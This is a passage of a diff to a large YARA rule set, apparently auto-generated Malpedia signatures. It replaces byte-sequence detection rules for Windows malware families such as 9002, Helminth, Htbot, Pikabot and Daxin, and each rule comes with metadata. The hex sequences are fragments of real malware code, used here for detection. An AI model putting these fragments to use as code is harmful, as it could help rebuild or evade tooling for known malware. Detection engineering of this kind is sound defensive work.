"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wininetloader_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "c7d0b1dfe74b472c5174a4761a9428ccee3d781f889972cf04ca5a6d741a211f" - score = 50 + logic_hash = "18fd24bb687ec61c125dfaa2108b7d0deaa39d2f9fd1538d0119b221d934fb42" + score = 75 quality = 75 tags = "FILE" version = "1" @@ -140328,34 +143256,34 @@ rule MALPEDIA_Win_Wndtest_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d1439 8a0410 320419 41 } - $sequence_1 = { 56 ffd7 8b0d???????? a3???????? a1???????? } - $sequence_2 = { 56 0fbe7001 83f60d 57 } - $sequence_3 = { 880c3e 5f 5e 8be5 } - $sequence_4 = { 75ea 8bcb 0fb6d2 c1e918 33ca c1e308 } - $sequence_5 = { a3???????? a1???????? 50 51 e8???????? 83c408 50 } - $sequence_6 = { 2bc2 40 50 e8???????? 8bd0 } - $sequence_7 = { ffd7 8b15???????? a3???????? a1???????? 52 50 e8???????? } - $sequence_8 = { 83c404 33c9 8d460a ba02000000 f7e2 } - $sequence_9 = { 8b0d???????? 894808 e9???????? 8d46fe 8bff 668b4802 } + $sequence_0 = { 7510 0fb611 0fb6c2 80fa28 7423 80fa29 741e } + $sequence_1 = { 4c8bac2480000000 90 493bdf 74db 0fb633 498bcd 410fb61424 } + $sequence_2 = { 48897c2460 4d8bc5 488b542438 488bc8 e8???????? 4b8d042e 4889442458 } + $sequence_3 = { 90 488d5508 48837d2008 480f435508 488b4518 4c8d0c42 4c8d4508 } + $sequence_4 = { e8???????? 3a03 7516 488bcf e8???????? 4c8b45f8 488b4df0 } + $sequence_5 = { 4c8be0 4889442450 4885db 7427 488b03 488bcb 488b4010 } + $sequence_6 = { 4c894d08 33db 448bf3 895c2470 49395910 752b 488d15b6ea1100 } + $sequence_7 = { 3a8c2ab8a80e00 0f8585000000 488b03 48ffc2 8a08 48ffc0 488903 } + $sequence_8 = { 488d1d48970500 807e5704 7704 488b5e48 48ffc7 803c3b00 75f7 } + $sequence_9 = { eb21 48c74424200f000000 4c8d0d54fd0900 4533c0 418d500f 488d4c2430 e8???????? } condition: - 7 of them and filesize <901120 + 7 of them and filesize <2659328 } -rule MALPEDIA_Win_9002_Auto : FILE +rule MALPEDIA_Win_Helminth_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "49e80af5-ef9d-5bf8-b3b9-b7af1f356471" + id = "e8458d0c-0e53-5434-b94f-d27e99b6a572" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.9002_auto.yar#L1-L290" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.helminth_auto.yar#L1-L159" license_url = "N/A" - logic_hash = "9d293b5dc33eac56c2e3f0cda3054624c24835d742e33a63df2c2aa725e52d40" + logic_hash = "40475479d37d8203c72424a48ad87a8ce641700a54f37b53283dc8f7df269c35" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -140367,53 +143295,37 @@ rule MALPEDIA_Win_9002_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7514 8b4714 8b08 51 e8???????? 8b5714 } - $sequence_1 = { 51 8944241c c744241801000000 ff15???????? 3d02010000 } - $sequence_2 = { 7504 33ed eb04 2bc8 } - $sequence_3 = { 8bd1 2bd0 3bda 7223 } - $sequence_4 = { 6a02 ff15???????? 68???????? ff15???????? 6a00 } - $sequence_5 = { 8b5c2408 6bdb08 03c3 8b00 } - $sequence_6 = { 33c9 3bc8 1bd2 f7da 8915???????? } - $sequence_7 = { 03c3 8b00 5b ffd0 8945fc } - $sequence_8 = { 51 e8???????? 6a06 6a01 6a02 e8???????? } - $sequence_9 = { 8be9 53 50 e8???????? } - $sequence_10 = { 7504 33d2 eb05 8b5608 2bd0 3bfa } - $sequence_11 = { 682c010000 50 ffd3 3d02010000 7508 } - $sequence_12 = { 6a00 6a02 6a03 6a00 e8???????? } - $sequence_13 = { 75f6 eb2f 8b542430 8b7c2414 8b6c2430 } - $sequence_14 = { 668b3c59 730d 33c9 8a0a } - $sequence_15 = { 59 8b0485e0d50010 8d0cf6 8064880400 85ff } - $sequence_16 = { 0311 8955fc 837df800 0f86e3000000 8b4508 03450c 2b45f8 } - $sequence_17 = { 68???????? 8d4610 50 8d4c2418 51 ff15???????? } - $sequence_18 = { 896f2c 8b4748 3bc5 740c 50 } - $sequence_19 = { 8d4c240c c644243002 ff15???????? 8bc6 } - $sequence_20 = { 6a00 8bd8 51 57 53 } - $sequence_21 = { 8b4c242c 5f 89411c 8b442410 895118 8b542434 894124 } - $sequence_22 = { 33c4 50 8d442428 64a300000000 8bf1 89742408 68???????? } - $sequence_23 = { 8939 89742410 e9???????? 33f6 83ff14 } - $sequence_24 = { 0fb74e08 0fafcf 5f 03c1 5e } - $sequence_25 = { 031481 52 8b450c 50 } - $sequence_26 = { 5d 83c410 c3 8b4508 85c0 7499 } - $sequence_27 = { 2bc5 c1ef05 2bcf 2bf5 66898c5a98010000 33c9 } - $sequence_28 = { 64a300000000 8b7c2444 8bf1 33db 57 8d4e10 89742414 } - $sequence_29 = { 8b742408 57 85f6 742e 0fb74602 8b7c2410 3bf8 } - $sequence_30 = { 8b5c2424 3bcb 0f83f6040000 33db } + $sequence_0 = { a1???????? 68e8030000 8907 e8???????? } + $sequence_1 = { 83e61f c1e606 57 8b3c9d70750110 8a4c3704 } + $sequence_2 = { 894c2408 8d9b00000000 668b02 83c202 6685c0 } + $sequence_3 = { c1e106 899528e5ffff 53 8b149570750110 898d24e5ffff 8a5c1124 02db } + $sequence_4 = { 85ff 0f84be000000 897de0 8b049d70750110 0500080000 3bf8 } + $sequence_5 = { 03f2 eb5c 8b45f4 8b0c8570750110 f644190448 } + $sequence_6 = { 80c980 884c3704 8b0c9d70750110 8a443124 2481 } + $sequence_7 = { 2c2c 2c2c 232425???????? 2c2c 2c2c 2c2c } + $sequence_8 = { e8???????? 59 6a64 ff15???????? 57 57 } + $sequence_9 = { 8bf9 897c2410 e8???????? 8bcf } + $sequence_10 = { 8a02 8b9524e5ffff 8b0c9d28eb4100 88440a34 8b049d28eb4100 c744023801000000 } + $sequence_11 = { 663bc1 75f4 6a18 59 be???????? } + $sequence_12 = { a1???????? eb0c c745e4a4ee4100 a1???????? 33db } + $sequence_13 = { 83c102 663bc3 75f4 a1???????? 8bd7 } + $sequence_14 = { 6a03 68???????? 8d0c458ce44100 8bc1 2d???????? d1f8 } condition: - 7 of them and filesize <204800 + 7 of them and filesize <479232 } -rule MALPEDIA_Win_Former_First_Rat_Auto : FILE +rule MALPEDIA_Win_Htbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e13a8bc3-e4cb-54c7-a2c1-b71b74a37c2c" + id = "9061a5e4-8534-51fe-80a9-1a440b66e0d7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.former_first_rat_auto.yar#L1-L167" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.htbot_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "79676675a5e0c5d1eb84217b80928525157e507544e18d7d0452685a540a1268" + logic_hash = "90f98baa748c169d2b4b8297454f9f854e4138797b2c83ac6d83acccfa4dd9b0" score = 75 quality = 75 tags = "FILE" @@ -140427,38 +143339,32 @@ rule MALPEDIA_Win_Former_First_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 899424ec030000 898c24e8030000 8b4f10 8d9424e8030000 6a00 52 898424f8030000 } - $sequence_1 = { 894c240c 8bd3 3bc1 7420 8d642400 8bf0 } - $sequence_2 = { 52 bb1c000000 8d742428 894c245c c744246000000000 } - $sequence_3 = { e8???????? 8b8d0cffffff 68???????? 51 e8???????? } - $sequence_4 = { ff15???????? 33c0 66833d????????09 0f94c0 a3???????? 6808020000 } - $sequence_5 = { c785e8feffff0f000000 899decfeffff 899df0feffff 899d04ffffff 899df4feffff } - $sequence_6 = { e8???????? 8d8de0feffff 51 bb08000000 e8???????? 8b9df8feffff 57 } - $sequence_7 = { 8bf2 8bfb 81c208020000 b982000000 81c308020000 f3a5 3bd0 } - $sequence_8 = { 48897c2428 488d05169b0200 488907 488d4f08 e8???????? } - $sequence_9 = { 480f42db 4883792010 7206 488b4908 eb04 } - $sequence_10 = { 48837e2008 7209 488b4e08 e8???????? 488d4608 } - $sequence_11 = { 48895c2468 0f28442450 660f7f442450 0f284c2460 660f7f4c2460 } - $sequence_12 = { 48896c2460 40886c2450 488bcb e8???????? } - $sequence_13 = { 488d4754 48894760 48832100 488b4748 48832000 } - $sequence_14 = { 90 48017e20 488b7620 4881c670ffffff } - $sequence_15 = { 488b7968 488d0532800200 8bf2 488bd9 } + $sequence_0 = { 6a00 68???????? 51 ff15???????? 85c0 7524 } + $sequence_1 = { 56 57 8b7c2440 8b474c 89442414 c7474c00000000 } + $sequence_2 = { 8908 8b15???????? 8d0c52 83c2ff a3???????? 8d4488f8 8b0d???????? } + $sequence_3 = { 8b11 50 8b4204 ffd0 8bc5 e9???????? 8d77f0 } + $sequence_4 = { 51 8bc8 ffd2 8bf8 85ff 0f84ccfeffff 8b4604 } + $sequence_5 = { 83f801 7e68 8d4d02 6a22 51 } + $sequence_6 = { 83c010 894510 c684244402000003 a1???????? 8b500c b9???????? ffd2 } + $sequence_7 = { 8903 c744241c00000000 8b7c2424 8b4708 83c708 8378f400 c744241001000000 } + $sequence_8 = { 83c010 894514 c684244402000004 a1???????? 8b500c } + $sequence_9 = { 51 ff15???????? 8d46f0 8d500c 83c9ff f00fc10a 49 } condition: - 7 of them and filesize <626688 + 7 of them and filesize <196608 } -rule MALPEDIA_Win_Spybot_Auto : FILE +rule MALPEDIA_Win_Hesperbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bb20c1b9-da8a-50d3-8d1c-08fd01abaeb2" + id = "a7df8c05-0ba7-5df5-beac-3b2d7fa2a54e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spybot_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hesperbot_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "f1b579b5b1ee691f466e64e8179031f49e4fd32bcc6dd2bb1d3af2d36456dc74" + logic_hash = "791429e92dde914e6ba42c9451f8338c991a26d1b1d12ebf3b674c1fb1ca0de1" score = 75 quality = 75 tags = "FILE" @@ -140472,32 +143378,32 @@ rule MALPEDIA_Win_Spybot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ffb574ffffff ff750c e8???????? 83c428 e9???????? } - $sequence_1 = { 50 e8???????? 83c40c 8d4508 be08010000 50 } - $sequence_2 = { 8d45ec 50 e8???????? 8d45ec 885dee 50 8d8548ffffff } - $sequence_3 = { 80bd48ffffff30 7c09 80bd48ffffff39 7e16 6a03 8d8548ffffff 68???????? } - $sequence_4 = { 56 68???????? e8???????? 59 85c0 59 0f85d7000000 } - $sequence_5 = { 3b35???????? 0f83c5010000 8bc6 83e61f c1f805 c1e603 8d1c85e07e5100 } - $sequence_6 = { 69c034020000 59 389890814400 0f84fb2b0000 395df4 0f84f22b0000 ff7520 } - $sequence_7 = { 8d850cfbffff 53 50 68???????? 53 53 ff15???????? } - $sequence_8 = { 898510fbffff 8b45fc 898598fbffff 8b45f8 3bf3 89859cfbffff 751c } - $sequence_9 = { 750b 57 ff15???????? 8bc6 eb02 } + $sequence_0 = { 33f0 8b442440 0b442438 33cf 23442448 8b7c2444 8b5c2440 } + $sequence_1 = { f60602 740e 8bc6 e8???????? 85c0 7403 8326fd } + $sequence_2 = { 85f6 7454 817d0818040000 724b 57 8b3e } + $sequence_3 = { 59 59 85c0 741e ff7510 8b450c 8d4ddc } + $sequence_4 = { 8d45ec b975382414 46 e8???????? 8d45ec 6a10 50 } + $sequence_5 = { 03f3 837f1800 7639 8b0e 03cb e8???????? 3b4508 } + $sequence_6 = { 8b01 eb0b 8b5008 3b54240c } + $sequence_7 = { c9 c3 64a130000000 c3 55 8bec 83ec48 } + $sequence_8 = { 56 33f6 85c0 741a 0fb71471 83fa41 720c } + $sequence_9 = { 7308 e8???????? 33d2 42 } condition: - 7 of them and filesize <2367488 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Narilam_Auto : FILE +rule MALPEDIA_Win_Pikabot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "da9d4048-8edf-5bad-820f-4e60bf8a1167" + id = "16fbebe5-029d-50d1-a8a8-9f8a45a24f27" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.narilam_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pikabot_auto.yar#L1-L175" license_url = "N/A" - logic_hash = "9c97c97f1983ca4888bd0ceffb3db6cc9301c52fb6e7adafbcc7af03cf7073fe" + logic_hash = "81c8e73356106864f0a8f72d23108459a17754dd4d587aefd7feb43e822dba1f" score = 75 quality = 75 tags = "FILE" @@ -140511,34 +143417,41 @@ rule MALPEDIA_Win_Narilam_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? f645f801 7518 8d55f4 a1???????? e8???????? 8b45f4 } - $sequence_1 = { 8d8550ffffff ba02000000 e8???????? 66c785dcfeffffe801 ba???????? 8d854cffffff e8???????? } - $sequence_2 = { e8???????? 8b55fc 8bc6 e8???????? 8bf8 e9???????? 8d5308 } - $sequence_3 = { eb83 e9???????? 66b86801 ebf5 66b86901 ebef 66b86a01 } - $sequence_4 = { e8???????? eb08 8b45fc e8???????? 33c0 5a 59 } - $sequence_5 = { e8???????? c3 3a90e2020000 740b 8890e2020000 e8???????? c3 } - $sequence_6 = { e8???????? 8bc8 8bd3 8b831c020000 ff9318020000 33c0 8a45ff } - $sequence_7 = { a5 a5 a5 8d4584 8d4dd4 ba04000000 e8???????? } - $sequence_8 = { ff852cffffff 8d5588 8d45fc e8???????? ff8d2cffffff 8d4588 ba02000000 } - $sequence_9 = { 8d8580feffff e8???????? ff854cfeffff 8d9580feffff 8d45fc e8???????? ff8d4cfeffff } + $sequence_0 = { 8945f8 8b4510 8945f4 8b4510 48 } + $sequence_1 = { 894510 837df400 741a 8b45fc 8b4df8 8a09 } + $sequence_2 = { 8b4df8 8a09 8808 8b45fc } + $sequence_3 = { 40 8945fc 8b45f8 40 8945f8 ebd3 8b4508 } + $sequence_4 = { 8945f8 ebd3 8b4508 c9 c3 55 } + $sequence_5 = { 83ec0c 8b4508 8945fc 8b450c 8945f8 8b4510 } + $sequence_6 = { 7ce9 8b4214 2b420c 5f } + $sequence_7 = { e8???????? ffd0 c9 c3 55 8bec } + $sequence_8 = { 8bfa 85c9 7436 85ff } + $sequence_9 = { 8b0cba 03ce e8???????? 8bd0 } + $sequence_10 = { 8a1c08 8d4320 0fb6c8 8d53bf 80fa19 } + $sequence_11 = { 40 8945fc 3bc7 72d5 } + $sequence_12 = { 55 8bec 83ec10 53 56 8b35???????? b84d5a0000 } + $sequence_13 = { e8???????? 8bd0 e8???????? 3b45fc } + $sequence_14 = { c3 56 8bf1 85c9 7419 85d2 7415 } + $sequence_15 = { 84c0 75f6 c60100 8bc6 5e } + $sequence_16 = { c9 c3 64a130000000 8b4018 c3 55 } condition: - 7 of them and filesize <3325952 + 7 of them and filesize <1717248 } -rule MALPEDIA_Win_Sisfader_Auto : FILE +rule MALPEDIA_Win_Httpbrowser_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1937373c-a869-5de8-8c47-c30db9548d3e" + id = "86ed1f1e-9c83-5189-8446-3be88e9701cf" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sisfader_auto.yar#L1-L291" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.httpbrowser_auto.yar#L1-L178" license_url = "N/A" - logic_hash = "288baaa87a5a9f6675c09b00537afbaf23a5deab091befb8544155fddb8ada09" + logic_hash = "5b5149262889d64634c3067408a546cd5b0c2e08f2004303b6cf9132eb7eeb82" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -140550,52 +143463,38 @@ rule MALPEDIA_Win_Sisfader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c9 741f 33c0 85c9 } - $sequence_1 = { e8???????? 85c0 b91d000000 0f44d9 } - $sequence_2 = { 8906 83f824 723e b824000000 } - $sequence_3 = { 8b4dfc 51 8b55f8 52 e8???????? 83c408 8945f4 } - $sequence_4 = { 33d2 b904000000 e8???????? 33c0 83f801 7425 baffffffff } - $sequence_5 = { 83793000 0f85be000000 8b55fc 8b45f0 } - $sequence_6 = { 837c245000 7402 eb12 c744245401000000 33c0 } - $sequence_7 = { c705????????07000000 8b442438 8905???????? c705????????00000000 8b442440 8905???????? c705????????b80b0000 } - $sequence_8 = { 837c242001 7425 837c242002 7441 837c242003 745d 837c242004 } - $sequence_9 = { 85c0 752b 8d45f8 c745f882000000 50 8d8618010000 50 } - $sequence_10 = { 66837c246c2e 7518 0fb74c246e 6685c9 } - $sequence_11 = { 83790800 745d c745f800000000 eb09 8b55f8 83c201 } - $sequence_12 = { 746b c744242000000000 eb0a 8b442420 } - $sequence_13 = { 6a04 e8???????? 83c40c 8b4d0c 51 } - $sequence_14 = { 8b442448 89442420 837c242001 7402 eb05 e8???????? } - $sequence_15 = { 8b45f0 83781000 750e 8b4df0 8b510c 0355cc 8955e4 } - $sequence_16 = { 0fb74c247e 6685c9 0f84cd010000 6683f92e 750f } - $sequence_17 = { 720b 03f0 eb9c 5f 5e 33c0 5b } - $sequence_18 = { e8???????? b90e000000 ff15???????? 33c0 e9???????? e9???????? ff15???????? } - $sequence_19 = { 745d 837c242004 7479 837c242005 0f8480000000 } - $sequence_20 = { ebbc 8b4dfc 8b5108 52 ff15???????? 83c404 8b45fc } - $sequence_21 = { 8d8574fdffff 6804010000 50 6a00 ff15???????? 8d8574fdffff } - $sequence_22 = { 7426 8b4f04 85c9 741f } - $sequence_23 = { 8139aaeeddff 0f858e000000 8b4104 85c0 } - $sequence_24 = { 8b45fc 8b08 83792800 7457 } - $sequence_25 = { 85c9 7513 ffb318020000 ff15???????? 33c0 5b } - $sequence_26 = { 8b45ac 894610 8b45b0 894614 ff15???????? 66894604 8d45e8 } - $sequence_27 = { 8b55fc 8b4230 50 ff15???????? 83c404 } - $sequence_28 = { ba08020000 0f114014 c7400856120000 89580c c700aaeeddff } - $sequence_29 = { 85c0 7416 0f1f4000 8bc1 83e00f 8a0430 30441124 } + $sequence_0 = { 50 ff7508 6a00 53 ffd6 8b45fc 33c9 } + $sequence_1 = { 50 895de0 ff5604 8945f0 85db 0f8489010000 } + $sequence_2 = { 33c5 8945fc 53 56 57 8d859cfeffff 33ff } + $sequence_3 = { 8d85f0fdffff 50 8d85d0f5ffff 50 ff15???????? } + $sequence_4 = { 56 6a03 6800000040 8d85f4fdffff 50 ff15???????? } + $sequence_5 = { e8???????? 83c40c 33c0 56 668985c8f3ffff 8d85caf3ffff } + $sequence_6 = { 83c438 ff15???????? 8d85f4fdffff 50 53 57 } + $sequence_7 = { ffb5f4edffff 8d85fcfdffff ffb5f8edffff 68???????? 50 } + $sequence_8 = { e8???????? 68c20ddf13 56 a3???????? e8???????? 83c438 } + $sequence_9 = { 6a00 6810040000 ff15???????? 8bf0 57 6a0e 56 } + $sequence_10 = { 83c414 c745ec00000000 68???????? 50 9c b80a000000 51 } + $sequence_11 = { b905000000 8db524ffffff 8dbda4feffff 8945e4 } + $sequence_12 = { 33c0 8dbd26ffffff 66899524ffffff f3ab 8955e8 8955f8 8955fc } + $sequence_13 = { 40 0068ae 224000 50 b822010000 } + $sequence_14 = { 8895a0c5ffff f3ab aa b91f000000 33c0 8dbd4affffff 66899548ffffff } + $sequence_15 = { 8b15???????? 8945d8 a1???????? 894ddc 668b0d???????? } condition: - 7 of them and filesize <417792 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Jupiter_Auto : FILE +rule MALPEDIA_Win_Remcom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "36445056-0ae8-5be8-adc6-1a78abf2ec58" + id = "a3eb8b2b-3833-5f4e-a476-a250aeb73992" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jupiter" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jupiter_auto.yar#L1-L112" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.remcom_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "f1911af4b4fd9bd3e29d91af55822bde97c05f4b517de64421dfe8b0d1264d94" + logic_hash = "4f3e16a0ac97921c2fcb2fdd27863c94129d85212bc306f9915a79a291488cb1" score = 75 quality = 75 tags = "FILE" @@ -140609,34 +143508,34 @@ rule MALPEDIA_Win_Jupiter_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8a4147 884104 8a4146 884105 8b4144 c1f808 884106 } - $sequence_1 = { c605????????01 66c705????????0101 c605????????01 c605????????01 66c705????????0101 } - $sequence_2 = { 8b4144 c1f808 884106 8a4144 884107 } - $sequence_3 = { 884105 8b4144 c1f808 884106 8a4144 } - $sequence_4 = { 50 6802000000 ff35???????? ff35???????? } - $sequence_5 = { 66c705????????0101 c605????????01 c605????????01 c605????????01 } - $sequence_6 = { 884105 8b4144 c1f808 884106 8a4144 884107 } - $sequence_7 = { c1f808 884106 8a4144 884107 } - $sequence_8 = { c605????????01 66c705????????0101 c605????????01 c605????????01 } - $sequence_9 = { 884104 8a4146 884105 8b4144 } + $sequence_0 = { 8be5 5d c3 53 56 8d95f8feffff } + $sequence_1 = { 83c8ff 89463c 894638 894640 8b8708110000 50 8d9f0c110000 } + $sequence_2 = { e8???????? a1???????? 33c5 8945fc 56 8b7508 68???????? } + $sequence_3 = { 50 8d9f0c110000 53 68???????? 8d55e0 68???????? } + $sequence_4 = { 008891400023 d18a0688078a 46 018847018a46 } + $sequence_5 = { 52 ffd3 85c0 7507 ffd7 8945f0 eb78 } + $sequence_6 = { 6a00 6a01 8d4de0 51 ffd3 8d45f4 50 } + $sequence_7 = { 8d8e00100000 f7d8 1bc0 23c1 8d8de4feffff } + $sequence_8 = { 8b7508 8d34f528e54000 391e 7404 8bc7 } + $sequence_9 = { 6a00 51 ffd7 8b4638 6a00 50 ffd7 } condition: - 7 of them and filesize <224112 + 7 of them and filesize <155648 } -rule MALPEDIA_Win_Colony_Auto : FILE +rule MALPEDIA_Win_Daxin_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2ec04e04-70c5-5f61-acc9-0f96a006c29a" + id = "f296881b-770d-5563-abfb-71fa7b0b574a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.colony_auto.yar#L1-L225" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daxin" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.daxin_auto.yar#L1-L156" license_url = "N/A" - logic_hash = "a79879d34246651b7f75532605ca94c4866e5edbca41b238eabaad9f54198dce" + logic_hash = "474b282908002ac6ff5a401d8cd2ee0d1c71eaec687bd0f7b672c512154787e2" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -140648,46 +143547,37 @@ rule MALPEDIA_Win_Colony_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0118 e9???????? 6a00 6818200000 } - $sequence_1 = { 0118 e9???????? c745ec00000000 85db } - $sequence_2 = { 03c1 50 e8???????? 83c40c 8b45f0 } - $sequence_3 = { 8b421c 2b4218 660f6ec0 f30fe6c0 } - $sequence_4 = { 8b4214 2b4210 660f6ec0 f30fe6c0 } - $sequence_5 = { 0101 0101 0101 0202 0202 0200 } - $sequence_6 = { 69d200008f04 2bc8 c1e910 69c161a4f778 2bd0 } - $sequence_7 = { 0102 894dec 3bcb 7c85 } - $sequence_8 = { 7407 b901000000 eb0a 33c9 803f01 0f95c1 33c0 } - $sequence_9 = { 8b420c 2b4208 660f6ec0 f30fe6c0 } - $sequence_10 = { 034de8 894604 893e 8930 } - $sequence_11 = { 740f 0301 eb0b a801 } - $sequence_12 = { 03f1 ff15???????? 8b0d???????? 53 } - $sequence_13 = { 03c0 8985bcfbffff 8d85bcfbffff 6a00 } - $sequence_14 = { 8a4202 8841ff 8b02 c1e808 } - $sequence_15 = { 660f6e4104 f30fe6c0 84c0 7509 } - $sequence_16 = { 488d15e5980000 483305???????? 488bcb 488905???????? ff15???????? 488d15e7980000 483305???????? } - $sequence_17 = { e8???????? 4803db 4c8d3590fc0000 49833cde00 7407 } - $sequence_18 = { 837b0801 7524 4863c6 488d15551a0100 4533c0 488d0c80 ffc6 } - $sequence_19 = { 488905???????? ff15???????? 488d15f3980000 483305???????? 488bcb 488905???????? } - $sequence_20 = { 488d3d0cb8ffff 488bcf e8???????? 85c0 } - $sequence_21 = { 488d1552fb0000 483950f0 740c 488b10 4885d2 7404 f044010a } - $sequence_22 = { 0f8c65030000 488d3534ac0000 4883ee60 4585ed 0f843f030000 } - $sequence_23 = { 3b0d???????? 7367 4863c1 4c8d354acd0000 488bf8 83e01f 48c1ff05 } + $sequence_0 = { 2bc2 d1f8 99 f7f9 } + $sequence_1 = { ff15???????? 488b0d???????? 483bcb 7458 895c2448 48895c2440 895c2438 } + $sequence_2 = { 751a baea050000 33c9 41b84d4b4353 } + $sequence_3 = { ff15???????? 488983f8000000 4883a3d800000000 33d2 488d8bb0000000 448d4220 e8???????? } + $sequence_4 = { 83e21f 03c2 8bc8 83e01f c1f905 2bc2 488b5328 } + $sequence_5 = { ff15???????? 488b0d???????? 48832700 33d2 4533c0 } + $sequence_6 = { 83e27f 03c2 83e07f 2bc2 4863c8 8a8419c5010000 } + $sequence_7 = { 83e3e0 41b84d4b4353 83c320 83e203 03c2 895910 c1f802 } + $sequence_8 = { 88480d 8b5368 42 895368 } + $sequence_9 = { 884c241b c744241c08000000 c783b401000001000000 ff93f0020000 } + $sequence_10 = { 884c2450 83c9ff 33c0 f2ae } + $sequence_11 = { 885004 33c0 f2ae f7d1 } + $sequence_12 = { 88480d 8b4500 50 ff5018 } + $sequence_13 = { 884805 8b0b b807000000 c6410600 8b4b04 3bc8 } + $sequence_14 = { 88482b 81c6a1000000 8990b0000000 3bf2 } condition: - 7 of them and filesize <7599104 + 7 of them and filesize <3475456 } -rule MALPEDIA_Win_Gameover_Dga_Auto : FILE +rule MALPEDIA_Win_Tmanger_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "49ca0960-3057-5b3f-bfaa-26bec43ff964" + id = "78f3e107-dd73-5ac6-8162-9004595db040" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gameover_dga_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tmanger_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "04f58b9dead2fa0c3d00122a20892474bd44e61e3b7f09f6fdc5edfc6227d8a8" + logic_hash = 